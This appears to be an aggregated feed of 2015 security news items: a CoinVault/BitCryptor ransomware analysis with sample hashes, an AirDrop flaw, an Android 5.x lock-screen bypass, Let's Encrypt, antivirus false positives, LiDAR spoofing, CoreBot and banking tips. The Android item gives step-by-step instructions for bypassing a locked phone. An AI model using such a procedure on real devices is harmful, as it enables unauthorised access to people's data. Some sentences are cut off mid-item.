Once executed, the malware resolved the two hardcoded domain names to IP addresses. After that it started the keylogger and a timer. Once the set time had elapsed, the search for bitcoin wallets began. Most likely the attackers implemented this functionality because mining for bitcoins has become increasingly hard.



In addition, the malware was able to execute commands received from the C2.


Coinvault, are we reaching the end of the nightmare?

Back to CoinVault

Fast forward two months and we saw another example of CoinVault. This time the program code had striking similarities with Comhost. For example, some functions such as fixNOIPhosts(), were almost identical, marking a clear connection between CoinVault and Comhost. The design of the program was also very similar to Comhost.

Fortunately, the authors of this piece of malware made a small mistake. Instead of overwriting the original file with encrypted content, they created a new file in the same directory with a ._clf extension.


Coinvault, are we reaching the end of the nightmare?

Next, the original file was deleted by calling the File.Delete() function. Internally, this method was implemented as a call to the Win32Native.DeleteFile() function. The DeleteFile function marked the file as deleted in the MFT entry. This meant that CoinVault victims, who got infected with this specific version of the malware, were probably able to retrieve deleted files during forensic activity (when not too much disk activity had taken place after deleting the file).

The introduction of the S.H.I.E.L.D Runner and added functionality

One month after the appearance of the last CoinVault sample, a new version of Comhost was introduced. This was the first sample that contained the “S.H.I.E.L.D Runner”. The functionality of this particular piece of code has already been discussed in a previous blogpost

Apparently the malware authors were not quite satisfied with the previous version of Comhost. They forgot to add a keylogger functionality (to check for caps lock etc.) Another interesting added feature was the antivirus and default browser collection feature, which sent information on these programs to the C2. However, the most interesting new feature was the ActivecaptionWatcher class, which was able to take screenshots and send these to the C2.

Mailspreader and added obfuscation

In November 2014 we had already written about CoinVault: this post discussed the sample that appeared a few weeks after the last version of Comhost. All the samples that appeared around this date were obfuscated with Confuser. But one thing that we omitted in our analysis was a functionality that we couldn’t really place back then: the internal class ’emailDownloader’.

This class contained some interesting pieces of code that needed to be further analysed. The presence of several executable files was referenced, but where were they? And more importantly, what was their role during the infection?


Coinvault, are we reaching the end of the nightmare?

As it turns out, these files were dropped by the third piece of malware from the CoinVault family: the Mailspreader. The resources section within the binary shows that several files were embedded and we extracted them in order to study them separately.


Coinvault, are we reaching the end of the nightmare?

Code economy is a common pattern between all the modules found within CoinVault samples. The functionality was simple but more than enough to achieve the desired results. A thread was created and then started in order to utilize all the benefits offered by the ‘MailSpreader.exe’ file.


Coinvault, are we reaching the end of the nightmare?

As mentioned before, the C2 we discovered is shared with another sample, which had similar characteristics (MD5 hash value of AF0E5A5DF0BE279AA517E2FD65CADD5C), another indicator of the relationship between CoinVault and Mailspreader.

Using these executable files and a straightforward manner of making the infection ‘invisible’, the bad guys launched a new process that was hidden almost instantly, putting all the malicious email code to work.


Coinvault, are we reaching the end of the nightmare?

We still haven’t answered the question of what these executable files represent, or what their real use is in this ransomware scheme. We’ll start with ‘mailpv.exe’, which was part of CoinVault, presenting some ‘dropper’ methods to actually obtain the primary payload. For ‘nk2edit.exe’ and ‘livecv.exe.’ A quick Google search revealed their true nature: both were legitimate tools used to interact with Outlook and Windows Live messenger.

The file ‘livecv.exe‘ had an MD5 hash of D7FC749BB3B10FCC38DE498E8DB2639A, and presented a verified signature for the executable. As per the developer’s description of the utility, ‘LiveContactsView is a small utility that allows you to view the details of all contacts in your Windows Live Messenger’.


Coinvault, are we reaching the end of the nightmare?

The same happened after checking ‘nk2edit.exe‘ (C1A591727E4519AC0D94C59B680E00E4). This is a convenient utility that interacts with the AutoComplete list address book in Microsoft Outlook.


Coinvault, are we reaching the end of the nightmare?

RIP CoinVault

After the previous release of our CoinVault research, this threat and its creators remained silent for a while. It wasn’t until April 2015 that a new sample was spotted in the wild. The most noteworthy change was the presence of flawless Dutch phrases throughout the binary. Dutch is a relatively difficult language to write without any mistakes. Therefore, we suspected at the beginning of our research that there was a Dutch connection to the alleged malware authors.

Other interesting added functionality was the checking and killing of analysis and detection processes such as processhacker, spyhunter, roguekiller, etc. Moreover, this version also came with support for storing configuration data in .ini files.

Shortly after these new versions emerged, the Dutch police was able to seize the C2 server used by the criminals and provide us with the bitcoin wallet IDs, IVs and keys necessary for creating and providing a decryption tool.

And then…it stopped. We didn’t hear anything about CoinVault for a while and it seemed the campaign had ended.

Hello Bitcryptor

We were right that CoinVault had stopped. However, one month later BitCryptor emerged.

BitCryptor is clearly the successor of CoinVault, since most of the code is exactly the same. However, BitCryptor is not like the previous versions of CoinVault targeting a Dutch audience. All the written Dutch has been removed (as have all the links to CoinVault). A little feature has been added, that runs in the background and checks if the victim has already paid.


Since our initial report on CoinVault, and the presentation of the No Ransom campaign, the cybercriminals responsible for these creations have been trying to modify their creations to keep on targeting new victims. Winning the battle against ransomware is a joint effort between law enforcement, private companies and end-users. In this particular case, by working together, we achieved a great result: the apprehension of two suspects.

Nevertheless, now more than ever, education about how these threats operate and target victims is of paramount importance, along with alerting and reporting new incidents as soon as possible. Thanks to our fellow researcher Bart Blaze for sharing the samples – indeed we had a happy reversing time :-)

Coinvault, are we reaching the end of the nightmare?


0f1830174d7b08c0d1fcd9aea00cdc97 Trojan-Ransom.MSIL.CoinVault.l
10438b6d4f479779234ef60560d2f40c Trojan-Ransom.MSIL.CoinVault.p
174a3f6982d254a74d2db202fd87ec26 Trojan-Ransom.MSIL.CoinVault.f
289b43d3c234585285a38b2a0f4db2e3 Trojan-Ransom.MSIL.CoinVault.i
2f707ed9f368cd5838f5fb76abcd5bd9 Trojan-Ransom.MSIL.CoinVault.q
30bc17990350f44d74f4a2ca25cdb9e3 Trojan-Ransom.MSIL.CoinVault.s
45db7e51b39fd0669b4f78eedc00ad2f Trojan-Ransom.MSIL.CoinVault.n
4d46310bdfdc5c49615be5c61b13c8ae Trojan-Ransom.MSIL.CoinVault.r
4d52e7e6f4dc77c39c50ed84ce1b10b5 Trojan-Ransom.MSIL.CoinVault.s
60a5b27a525ca21026ffff1f0d0baa6a Trojan-Ransom.MSIL.CoinVault.t
648280e5ba36ff038e97e444ecdb9d8e Trojan-Ransom.MSIL.CoinVault.g
716dfea51b1a8d95859cfda38ff7fa9d Trojan-Ransom.MSIL.CoinVault.j
73848ec02d5d9f4d0fdd5be31ef86449 Trojan-Ransom.MSIL.CoinVault.u
78fd303be07db8fa35b98645bef10ca4 Trojan-Ransom.MSIL.CoinVault.v
7fff4eabcdfb21e7884a240e668f1e8b Trojan-Ransom.MSIL.CoinVault.i
876050d738f434fc149970cc0d073dbe Trojan-Ransom.MSIL.CoinVault.w
8e1bdc1c484bc03880c67424d80e351d Trojan-Ransom.MSIL.CoinVault.x
a6499dac9a7b59830c77442eb030c93c Trojan-Ransom.MSIL.CoinVault.a
a76df48770a6cffc62e4d1a21749071b Trojan-Ransom.MSIL.CoinVault.m
a90d5d05728fec4c592393c7f4ec173e Trojan-Ransom.MSIL.CoinVault.e
ac4b5ce347820c8817afd49eacee3ec5 Trojan-Ransom.MSIL.CoinVault.y
af0e5a5df0be279aa517e2fd65cadd5c Trojan-Ransom.MSIL.CoinVault.z
aff8fefe76cc51d5e7120ef3f422ce29 Trojan-Ransom.MSIL.CoinVault.ah
b3a7fc445abfba3429094542049063c2 Trojan-Ransom.MSIL.CoinVault.x
b3bb6facbb557ddd9aada93f6b2efab8 Trojan-Ransom.MSIL.CoinVault.h
b3e1c2fce9763a2bdd08223c406bcf7f Trojan-Ransom.MSIL.CoinVault.aa
b92ec8ccc085b853545fc54781d0c1a3 Trojan-Ransom.MSIL.CoinVault.ab
cb91d0db64d9245426c7789ed00ba4d3 Trojan-Ransom.MSIL.CoinVault.k
d5f291f2bc38873e145f6e6b13fb05db Trojan-Ransom.MSIL.CoinVault.d
e7414d82d69b902b5bc1efd0f3e201d7 Trojan-Ransom.MSIL.CoinVault.b
f293970741bbe0ee0c1b8ce6cb045d4d Trojan-Ransom.MSIL.CoinVault.b

AirDrop Bug in Apple iOS and OSX allows Hackers to Install Malware Silently


The latest iOS 9 includes a security update for a nasty bug that could be exploited to take full control of your iPhone or Macs, forcing most of the Apple users to download the latest update.
Australian security researcher Mark Dowd has disclosed a serious vulnerability in AirDrop, Apple's over-the-air file sharing service built into iOS and Mac OS X.
How the Attack Works?
The vulnerability allows anyone within the range of an AirDrop user to silently install a malicious app on a target Apple device by sending an AirDrop file which involves rebooting of the target device.
An attacker can exploit this critical bug even if the victim rejects the incoming file sent over AirDrop.
After rebooting takes place, the malicious app gains access to Springboard, Apple's software to manage iOS home screen, allowing the app to fool the victim’s iPhone into believing the malicious app has the same rights as a normal app.
These rights include access to:
and many more…
…that could allow a more illustrious hacker to break into other sensitive areas of the Apple's operating system, causing severe damage to the victim's device.
"AirDrop bug can be used to target people wirelessly in close proximity. Also useful for lock-screen bypass," Dowd, founder and director of Azimuth Security, tweeted.
Video Demonstration

Dowd also provided a video demonstration (you can watch below) showing the real time attack on his iPhone running iOS 8.4.1.
The vulnerability affects any iOS versions supporting AirDrop from iOS 7 onwards, as well as Mac OS X versions from Yosemite onwards.
Update to iOS 9 and Mac OS X EI Capitan
Apple has responded to the vulnerability by adding a sandbox to AirDrop in iOS 9 that would prevent anyone from writing files to arbitrary locations on the device via AirDrop service.
However, it isn't clear when Apple will provide a complete patch to fix the issue.
So the only way to prevent this attack, for now, is by upgrading your devices to iOS 9 and OS X 10.11 El Capitan, which won't roll out before September 16 and 30 respectively.

This Computer Chip Self-Destructs in 10 Seconds (On Command) to keep Secrets Safe


In Spy thriller movie “Mission Impossible”, every time Tom Cruise receives a secret message, the last words state - “This Tape message will self-destruct in 5 seconds”...and BOOM!
There’s a sudden explosion, and smoke comes out of the device; containing sensitive information few seconds ago.
This Self-destructing thing has become a reality now.
Palo Alto Research Center Incorporated (PARC) a Xerox company, involved in R&D in IT and hardware has under Defense Advanced Research Projects Agency’s (DARPA'S) Vanishing Programmable Resources (VAPR) achieved success in developing Self-Destructing computer chips capable of destruction in 10 seconds.
The phenomenon is quite familiar….isn’t it?
Now, with DARPA’s initiative this is soon going to become a reality intended mainly for the military personnel. With the idea of- “Protection of data that once existed.”
PARC showcased this breathtaking technology at the “Wait, What?” event of DARPA in St. Louis Thursday, as part of the agency’s VAPR project.
The early model build of the Integrated Circuit (IC) by PARC focuses on mainly two technologies namely:
Transient technology
DUST (Disintegration Upon Stress-Release Trigger) technology
The data stored in these chips may be encrypted data or a secret message intended for an authenticated person.
The chip designed on a Gorilla Glass substrate is capable of shattering on demand into millions of pieces which cannot be reconstructed. The same glass that is being used as a protective cover for the smartphones.
“We take the glass and we ion-exchange temper it to build in stress,” said Gregory Whiting, a senior scientist at PARC. “What you get is glass that, because it’s heavily stressed, breaks it fragments into tiny little pieces.”
The team of security researchers from PARC in the demonstration in St. Louis showed (See link below) how a laser light activated self-destructing circuit, also the activator could be an RF signal or a physical switch.
“Vanishing electronic devices can be used to address military security, data privacy, and environmental science,” says PARC.
DARPA awarded PARC with $2,128,834 amount of money as the contract award for the research under their VAPR program.
This discovery will prove to be of greater importance as, in military operations a piece of sensitive information is marked i.e. an authorized person shall only be able to access the information.

For this many authentication methods and procedures are being utilized by the military but somewhere or the other they are prone to get either stolen or victims of the cyber attack as seen in the current scenario.
The self-destructing chips leave no evidence for the data to be restructured.
This is not the first time such chips have been developed, DARPA has earlier awarded IBM with $3,455,473 in December 2014 for “Developing and establishing a basis set of materials, components, integration, and manufacturing capabilities to undergird this new class of electronics”.
At that time, IBM stated different use of materials and engineering to build the Self-destructing chips. Well, now let’s wait for their proposed idea to become a reality soon.

Hacker Finds a Simple Way to Bypass Android 5.x Lock Screen [Steps & Video]


, has found an easy way to bypass the security of locked smartphones running Android 5.0 and 5.1 (Build LMY48M).
Many of us use various security locks on our devices like Pattern lock, PIN lock and Password lock in order to protect the privacy of our devices.
However, a vulnerability could now allow anyone to take your Android smartphone (5.0 build LMY48I) with locked screen, perform a "MAGIC TRICK" and as a result crash the user interface (UI) for the password screen and gain access to your device.
The vulnerability, assigned CVE-2015-3860, has been dubbed as "Elevation of Privilege Vulnerability in Lockscreen".
How the Attack Works?
The secret behind the researcher's "MAGIC TRICK" is as follows:
Get the device and open the Emergency dialer screen.
Type a long string of numbers or special characters in the input field and copy-n-paste a long string continuously till its limit exhausts.
Now, copy that large string.
Open up the camera app accessible without a lock.
Drag the notification bar and push the settings icon, which will show a prompt for the password.
Now, paste the earlier copied string continuously to the input field of the password, to create an even larger string.
Come back to camera and divert yourself towards clicking pictures or increasing/decreasing the volume button with simultaneously tapping the password input field containing the large string in multiple places.
All this is done to make the camera app crash. Further, you will notice the soft buttons (home and back button) at the bottom of the screen will disappear, which is an indication that will enable the app to crash.
At this time, stop your actions and wait for the camera app to become unresponsive.
After a moment, the app will crash and get you to the Home Screen of the device with all the encrypted and unencrypted data.
Now without wasting time go to Settings > Developer options > Enable USB debugging and control the device by installing the Android Debug Bridge (ADB) utility.
Video Demonstration shows Attack in Work
Watch the video demonstration given below, where you can see practically how Gordon executed the hack.

In addition to this, if we notice the number of users with Android 5.0 and 5.1 with hardware compatibility as Nexus 4 and software installed as Google factory image - occam 5.1.1 (LMY47V) are less. Therefore, the risk associated will affect those users only.
Furthermore, for those users we have a good news that is- the patch has released for the vulnerability and is made public by Google.

Kaspersky Internet Security nově dostupný ve verzi 2016

16.9.2015 Zabezpečení
Novou verzi bezpečnostního řešení Internet Security multi-device uvedl na trh Kaspersky. Je plně v češtině a slouží ke komplexní ochraně uživatelských zařízení.
Součástí produktu jsou aktualizované technologie zajišťující ochranu uživatelů při jakékoliv on-line činnosti bez ohledu na to, zda používají platformu Windows, OS X nebo Android.

Například sociální sítě a reklamní či analytické agentury často požadují informace o online aktivitách uživatele, jako je například poloha či historie vyhledávání. Tato data získávají prostřednictvím prohlížeče, přeprodávají je a používají je k zobrazování kontextové reklamy.

Anonymní režim prohlížeče odstraní tyto informace z internetového provozu s pomocí paginu Kaspersky, který je dostupný pro Mozilla Firefox, Internet Explorer a Google Chrome, a nahlásí uživateli jakékoliv zablokované žádosti.

Tato technologie se podle výrobce odlišuje od ostatních nástrojů integrovaných do prohlížečů tím, že nezajišťuje jen prevenci před identifikací skrze soubory cookie či zobrazování varovných stránek, ale zaručuje, že data, která by vedla ke sledování uživatele, neopustí zařízení.

Funkce Change Control detekuje jakékoliv pokusy o provedení změn, nahlásí je uživateli a požádá o výslovné povolení procesu, nebo ho zablokuje.

Aktualizovaný nástroj Privacy Cleaner zase s odstraněním veškerých stop po aktivitách uživatele z počítačů s OS Windows, a to včetně historie vyhledávání či seznamu posledních otevřených dokumentů.

Funkce Webcam Protection zabrání zachycení snímků z webkamery, upozorní uživatele na přístup z legitimní aplikace a poskytne možnost zablokovat veškerý přístup ke kameře.

Let's Encrypt Project issues its First Free SSL/TLS Certificate
Last fall the non-profit foundation EFF (Electronic Frontier Foundation) launched an initiative called Let's Encrypt that aimed at providing Free Digital Cryptographic Certificates (TLS) to any website that needs them.

Today, Let's Encrypt – a free automated Open-source Certificate Authority (CA) – has signed its first certificate, hitting what it calls a major milestone to encrypt all of the Web.

Let's Encrypt enables any Internet site to protect its users with free SSL/TLS (Secure Socket Layer/Transport Layer Security) certificates that encrypt all the data passed between a website and users.

Not just free, but the initiative also makes HTTPS implementation easier for any website or online shopping site owner in order to ensure the security of their customers' data.
"Forget about hours (or sometimes days) of muddling through complicated programming to set up encryption on a website, or yearly fees," EFF explains. "Let’s Encrypt puts security in the hands of site owners."
The first certificate signed by Let's Encrypt is currently available only to beta-testers though anyone can check out the CA's first certificate on the group's website, which is issued for

Once clicked, the above HTTPS link may direct you to an SSL certificate error. It's because your browser does not trust the certificate authority right now.
"Let's Encrypt has not yet been added as a trusted authority to the major browsers (that will be happening soon)," the site explains. "So for now, you'll need to add the ISRG root certificate yourself. Specifics will depend on your browser. In Firefox, just click the link."
Sign-Up Now for Participating

Website owners who are interested in the beta testing phase can sign-up and submit their domain names for consideration.

Though major browsers do not yet recognize the certificate as a trusted authority, the Let's Encrypt team is working with Google (for Chrome), Microsoft (for Edge), Apple (for Safari), and Mozilla (for Firefox) to make it happen.

So, if everything goes well, the certificate will soon be available for everyone to use by the end of November 2015.

Securing the Internet with Let's Encrypt

Let's Encrypt is an initiative run by the Internet Security Research Group (ISRG) and backed by the EFF, Mozilla, Cisco, and Akamai, among others.

Specifically, Let's Encrypt promised to create a certificate authority (CA) which is:
Free – no charge for HTTPS certificates.
Automatic – the installation, the configuration as well as the renewal of the certs do not require any administrator actions.
Secure – the team is committed to being a model of best practice in their own operations.
Transparent – the records of all certificate issuance or revocation will be available publicly.
Open – the automatic issuance and renewal procedures will be published as an open standard.
Cooperative – Let's Encrypt is controlled by a multi-stakeholder organization and exists to benefit the community, not any of the consortium members.

Can an inevitable evil be conquered?


Scanning an object (a file or web resource) with an Internet security program essentially comes down to making a binary decision: dangerous or safe? An antivirus engine puts forward the hypothesis that an object is malicious and then checks whether this is true or not. Since there are, unfortunately, no perfect antivirus solutions, errors can occur. There are two types of error: the first kind is when safe objects are identified as dangerous; the second kind – when dangerous objects are identified as safe. Using the terminology inherited from mathematical statistics, errors of the first kind are called false positives.

Security system developers have varying attitudes towards false positives. Some regard the objective of combating infection as a higher priority. Kaspersky Lab’s position on this is absolutely clear: preventing false positives is as important as protecting against malware. Below, we look at the methods of fighting false positives, using our company as an example.

The negative positive

For the user, a false detection by the security solution means being unable to access a web resource or use a safe program. Regardless of how important a specific file or website is, a false detection is always an annoyance that can lead to a disruption of business processes.

If a program that has just been written by a user is falsely identified as dangerous, its author will send a complaint to the antivirus vendor, analysts will recognize the error and correct it next time the antivirus databases are updated. This usually takes several hours – provided, of course, that the program does not actually do anything beyond what is permissible for legitimate applications.

It is a completely different situation if an operating system component is identified as malicious. This could lead to much more dire consequences, sometimes as grave as system failure. And if this kind of false positive affects a large company, it will inevitably result in downtime and, as a consequence, lost profits. This is why we believe that companies that develop security systems should be very careful about errors of this type and should try to keep them to a minimum.

Reasons for false positives

First of all, it is essential to identify the reasons for such errors. These can vary.

The human factor is one possible reason for a false detection: an antivirus analyst is not immune to making mistakes. It is worth noting, however, that in today’s world instances of this are extremely rare, since nearly all threats (99%) are now detected automatically.

A false positive can occur when developers of legitimate applications use obfuscation (code entanglement) and packing (executable file compression). Cybercriminals often use these methods to make malware analysis more difficult, which is why security systems may suspect such applications of being malicious.

A false positive can be the result of using a generic signature that detects similar malicious objects. We have known for a long time that malicious objects are often variants of the same code. This means that by using more ‘intelligent’ classification methods we can identify a part that is common to all the similar malicious samples and create a single detection logic (i.e. a signature) that will provide detection of all the similar objects. Such generic signatures are created by different detection systems. The broader the criteria used by a system to identify the similar part of malicious objects, the greater the chances of the signature being triggered by a similar but innocuous object.

Finally, an object can be mistakenly identified as malicious by technologies that analyze program behavior. For example, if an unknown application begins to make suspicious changes to the system registry or to send the user’s private data over the network, the component that tracks operating system events should raise an alarm. The program doing this could be quite harmless, just not used very often.

Fighting false positives

Analysts have understood the potential consequences of false positives practically from the inception of the industry. However, both the number of users and the number of Internet threats was thousands of times smaller back then and antivirus databases were released at much longer intervals. This being the case, the methods used 18 years ago to check antivirus databases were fairly uncomplicated: developers had a collection of critical clean files (primarily system files) and the experts simply scanned the collection using the new database before releasing an update. If there was a false positive, the relevant detection was removed after the first complaints were received. That is, the analyst team manually corrected the databases, preventing the threat from reaching a large number of users.

With time, the stream of malware has grown thousands of times, both malicious programs and technologies used to detect malicious objects have become more sophisticated. Kaspersky Lab currently detects 325,000 new malicious objects every day. The range of methods used to combat Internet threats has also broadened: whereas in the nineties signature-based detection methods were quite equal to the task of protecting a computer, now Kaspersky Lab products include technologies that automatically prevent vulnerabilities from being exploited, tools for controlling application privileges, a component that tracks operating system events, and a range of other technologies. In addition, modern legitimate software databases take up terabytes of disk space.

Clearly, in such conditions it is no longer possible to use the archaic methods of fighting false positives. Today’s false positive prevention technologies are much more varied and effective. These methods are used both at the stage of detecting malicious objects and at that of testing and releasing databases. There is also a separate set of methods that help to minimize the chances of false positives appearing while a security product is operating.

Signature control

As Captain Obvious would put it, the easiest way to avoid false positives is to release error-free signatures. This is why special attention is given to the stages in which malicious object signatures are created. But even if an error manifests itself later, there is a way to correct the situation rapidly, even if the databases have already been installed on the user’s machine.

Detection stage (creating static signatures)

First, a dedicated automatic verification system analyzes the static signatures manually added to the databases by virus analysts. This is because a person, concentrating on closely analyzing code, may not see the complete picture. So, when somebody tries to add a signature to the database for an object that the system perceives as clean based on certain criteria, the automatic system reports the potential error to the analyst, together with the reasons for believing the object is clean.

Second, a collection of hashes (unique results of code transformation based on a specific algorithm) for objects known to be ‘clean’ is used to test new signatures for false positives. A signature created using a fragment of malicious code is matched against hashes from the collection. If the system detects that the new signature matches a legitimate object’s hash based on some criteria, a different code fragment is selected to create a signature for the threat.

Kaspersky Lab also keeps a separate database that contains the ‘personal record’ of each malicious object ever analyzed with protection technologies. When creating a detection, the past of a detected object is taken into account: if the object did not raise any suspicion in the past, it undergoes an additional check.

Additionally, a collection of files that have triggered false detections in the past is used for protection against errors. It helps to prevent incidents from occurring again if an object has been slightly modified (e.g. when a new version of a program is released).

Generic signatures are periodically added to static signature databases: if the automatic detection system registers lots of similar malware samples, a single detection logic is created to combat them.

Database testing and release stage

To ensure that signatures (static or generic) will not be triggered by ‘clean’ software, newly created databases are verified using the Dynamic Whitelist knowledge base. It is an enormous, continually expanding collection of legitimate software that also contains additional data on each object (developer, product name, the latest update version and much more). More detailed information on Dynamic Whitelist operation can be found here.

A special department at Kaspersky Lab is in charge of maintaining this collection and providing timely updates. Thanks to agreements signed with more than six hundred software development companies, most popular applications are included in the collection before they become commercially available to a broad user audience.

The system that performs the scanning deserves a separate mention. Since the legitimate software database is enormous and antivirus databases are updated once an hour, using a regular server to do the scanning is not an option. A distributed data processing system was developed specifically for this purpose. It uses dozens of servers and data storage facilities for load balancing.

All signatures that have raised even minor suspicions are entered into a separate register that can be called ‘potentially dangerous verdicts’. Such signatures undergo additional verification, often involving malware analysts.

Rapid response (fighting false positives at the operation stage)

When antivirus databases have passed all the necessary checks, they are distributed to users. The Kaspersky Security Network distributed cloud infrastructure receives statistics on any detections on user machines and tracks how many times each signature has been triggered.

Analysts responsible for releasing signature databases continue to carefully track how products respond to updates. If an anomaly is detected (a threat has been detected on too many user machines within a short time period), this could mean there is a false positive. In that case, an analyst receives an alert and begins to perform additional analysis of the detected object.

If analysis indicates that the object was identified as malicious by mistake, the Record Management System technology is triggered. It can recall a record in a matter of seconds, also using the Kaspersky Security Network. The incorrect signature is removed from databases, as well. If it turns out that a generic signature mistakenly detects ‘clean’ objects among others, analysts change the detection logic and correct the databases. In any case, by the next database update, the error will have been corrected.

Tracking proactive technology errors

At the development stage it is not so easy to check technologies that detect anomalous program behavior on user machines for false positives. Foreseeing all possible actions by the user on the machine and all the possible variants of ‘clean’ software that might be used in the process is virtually impossible. That is why it is primarily cloud technologies that protect users from false detections caused by proactive technologies.

When a product detects an unknown object – i.e. there is no information about it in local antivirus databases – the object’s hash is immediately sent to the cloud infrastructure, which responds with any available information in a split second. If the object is on the white list of trusted software, the object is recognized as safe.

In addition, cloud technologies can verify a suspicious file’s digital signature and the reputation of the company that issued the digital signature certificate. If the reputation is faultless and the certificate is genuine, this also indicates that the object is legitimate. It is worth noting that company reputation and signature data is not static. If incidents are reported, this may result in the loss of trust, leading to a change in the security solution’s response to the same files.

Proactive detection tools require particularly close attention when product functionality is being upgraded. When newly upgraded technologies start working in the field for the first time after lab testing, unforeseen errors may arise. This is why a phased approach is used instead of activating new protection mechanisms in all products at once. First, upgrades are supplied to a limited test group. If this does not result in false positives, the new features are made available to a broader user group. As a result, even if a new technology proves faulty, most users will never be aware of the fault.

Fighting false positives when scanning web resources

It is worth adding a few words about technologies that protect against false positives when scanning web resources. Kaspersky Security Network can track a resource’s reputation history. If malicious content is detected on one of the site’s pages, whether the site will be blocked completely or partially depends on its reputation. If the site has an impeccable reputation, Kaspersky Lab solutions will only block the page that poses a threat to users rather than the entire website.

Kaspersky Security Network also tracks the history of web resource hits. If a site that is popular with users is identified as dangerous, the automatic system will alert analysts, who will do an additional check. This helps to prevent false detections of popular resources.


False detections by security products are unavoidable – there are no ideal solutions. However, it is the objective of vendors to reduce them to a minimum. This is a feasible task.

Kaspersky Lab experts carefully monitor the operation of protection technologies to prevent them from making errors. For each type of object in which a threat can potentially be found (web pages, files, banners, boot sectors, traffic streams, etc.), there are special mechanisms designed to prevent false positives and separate collections of objects known to be clean.

Kaspersky Lab has a dedicated group responsible for improving existing methods of fighting false positives and developing new ones. It investigates each case, analyzes why a false detection occurred and creates tools that help to prevent similar errors in the future.

It is largely thanks to the efforts of this group that virtually no false positives have come up lately in tests of Kaspersky Lab products carried out by independent researchers.

Lasers can ‘immobilize driverless cars’


The laser technology used in driverless cars can be manipulated by attackers on a shoestring budget, allowing them to gain control of these vehicles, it has been revealed.
Speaking to the online technology news provider IEEE Spectrum recently, Jonathan Petit, principal scientist at Security Innovation, said that he has developed a way of getting into the system that allows autonomous cars to “see”.
The cost of doing so? According to Dr. Petit, cybercriminals can put together a homemade kit that will set them back roughly $60 (approximately £40). As he noted, “it’s really off the shelf”.
LiDAR, short for Light Detection And Ranging, is a type of technology that uses “light sensors to measure the distance between the sensor and the target object”.
It has been popular with manufacturers of self-driving cars, including the likes of Google – which has been instrumental in pioneering these futuristic vehicles – because it helps the onboard computer make sense of its environment, much like a human being.

Martial Red
Martial Red
However, the expert has found vulnerabilities within this system, flaws which demand a fundamental rethink of the technology behind it.
Currently, as it stands, a laser can be used can to trick the onboard computer into thinking that objects are in front of it when really the road is clear.
In turn, this deception will result in the vehicle automatically slowing down or even coming to a complete standstill. To all intents, the computer “sees” obstacles in its way.
“There are ways to solve it,” Dr. Petit continued in his interview with IEEE Spectrum. “A strong system that does misbehavior detection could crosscheck with other data and filter out those that aren’t plausible.
“But I don’t think carmakers have done it yet. This might be a good wake-up call for them.”
This is an important finding as driverless cars have been pitched as being safer and more efficient than traditional, human-controlled alternatives.

CoreBot Adds New Capabilities, Transitions to Banking Trojan


As researchers expected it would, CoreBot, the credential-stealing malware that surfaced last month, has added a bevy of new capabilities and reinvented itself as a robust banking Trojan.

Researchers said the malware shares more similarities with Dyre, another high profile banking Trojan, than a run of the mill data-stealing Trojan.

Perhaps the malware’s most telling characteristic is a new list of 55 URL triggers – triggers that researchers at IBM’s Security Intelligence claim are tied to a handful of online banking sites in the U.S., Canada, and the U.K. and can launch webinjects.

When the firm first published research on CoreBot late last month, researchers noted the malware’s flexibility, acknowledging its modular design as something that could potentially allow for the easy addition of new mechanisms later down the line.

Turns out, it didn’t take long for developers behind the malware to up the Trojan’s ante.

Similar to how Trojans such as Zeus, Dyre and Dridex work, CoreBot snakes the login information of victims, then tries to trick them into giving away more information.

“In its previous version, CoreBot was only defined as an information stealer because it did not possess the capabilities that would enable it to steal username and password combinations in real time from the victim’s browser. This has changed, and CoreBot now hooks the three most popular browsers — Google Chrome, Mozilla Firefox and Internet Explorer — to be able to monitor browsing, steal data and apply webinjections,” Limor Kessem, a Cybersecurity Evangelist with IBM, wrote of the malware last week.

According to Kessem, the malware uses a more-advanced, custom-made webinjection mechanism designed for banking credential theft. The malware has also incorporated a slew of other traits specific to banking Trojans such as man-in-the-middle capabilities, a VNC (virtual networking computing) module, and real-time form grabbing.

Now that the malware has matured into a full-fledged banking Trojan, speculation is beginning to mount whether or not some of the information it’s stealing is being sold online. In particular, researchers are wondering if a recently registered suspicious looking marketplace is peddling stolen CoreBot information.

Researchers with Damballa observed a sample of CoreBot last week communicating with a domain registered to a specific email address, drake.lampado777[at]gmail[.]com, that was also used to set up another domain, btcshop. Btcshop is being used to sell Socket Secure proxies and other personally identifiable information (PII) – something that’s led some researchers with the firm to believe there’s a relationship between the two.

Researchers with Damballa also noticed that two other domains communicating with the same IP address, including one being used as a Carberp command and control server, and another that’s hosting the TVSPY remote access tool (RAT), but it’s the btcshop, set up on July 30, that caught their attention the most.

While it’s a tenuous connection — Damballa isn’t completely certain the same person running CoreBot is the same person running TVSPY — the researchers insist it’s plausible.

“It would be convenient for the same person or a small group of people to be running malicious domains registered under the email and also running btcshop to sell their collected wares,” a blog entry on the company’s Day Before Zero Blog theorized on Friday.

Top tips on safe online banking from the comfort of your home


Banking online from the comfort of your own home may sound safe, but it doesn’t mean you are immune from attack. We look at what you need to do to reduce the chances of opportunistic attackers accessing your banking records and stealing your money.
Two-step verification
Two-factor authentication is for some users a relatively new and emerging trend, but it’s something that the banks have been aware of for some time.
Most banks have longed asked their customers to enter a customer password and PIN number to log into their accounts, but there’s now a move to issuing debit or credit card readers so users can log into their accounts, and/or authorize transactions.
For example, if you’re paying someone for the first time, you might be asked to confirm the payment details via the card reader, and to enter a small code on both the web page and card reader to verify that you are the rightful owner of that bank account.
If you don’t have one of these readers, ask your bank where you can get one.
The locked padlock sign – or unbroken key symbol – should always appear in your browser window when banking online, as this indicates you are using a secure HTTPS web connection that cannot be compromised or spied on. You should also see HTTPS at the start of the visited website address.
HTTP websites are still relatively safe, but because the connection is not encrypted, it could potentially be cracked in a man-in-the-middle (MiTM) attack, where an attacker looks to impersonate a trusted party to intercept data. Sometimes, they do this by pretending to be the certificate authority (CA) issuing the digital certificate for the web address, while other attacks may see them set-up a fake Wi-Fi hotspot and so on.
Password protect your Wi-Fi
Login password
A basic first step in any type of online security is making sure your own Wi-Fi is password-protected so no nefarious actors can hijack your web sessions.
You should create a password that is unique, strong and ideally compromising upper case and lower case letters, as well as numbers and symbols.
This advice also applies to your router. Many users never change the default administrative password as set by the internet service provider (ISP), which could result in someone potentially connecting to the network and changing the router settings to direct you to rogue websites. They could also set-up spoofed Wi-Fi hotspots in the hope you would connect to it.
Only use trusted sources
Clicking on links
You should always visit your bank online by using official applications or by typing its web address into a search engine. You should avoid clicking links claiming to direct you to the site, especially if it comes via on social media or email, as these webpages – which may even look like the official page – could be trying to steal your login credentials.
